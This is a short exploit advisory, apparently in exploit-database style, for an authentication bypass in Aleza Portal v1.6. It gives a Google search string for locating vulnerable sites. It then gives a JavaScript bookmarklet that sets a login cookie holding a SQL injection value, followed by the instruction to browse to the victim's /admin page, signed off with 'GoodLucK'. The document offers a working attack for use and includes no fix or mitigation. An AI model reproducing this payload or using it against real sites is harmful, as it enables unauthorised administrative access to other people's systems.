Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling
=========================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Aleza Portal v1.6
~Software: http://www.webavail.com/
-Demo : http://www.webavail.com/alezademo/
~Vulnerability Style : (SQLi) Cookie Handling
~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
Browser Injection for handling() by Javascript-SQLi Codes
================================
javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/";
================================
[+] Exploitable Browser Injected!
[+] Go to : http://[Victim]/admin
GoodLucK ;)
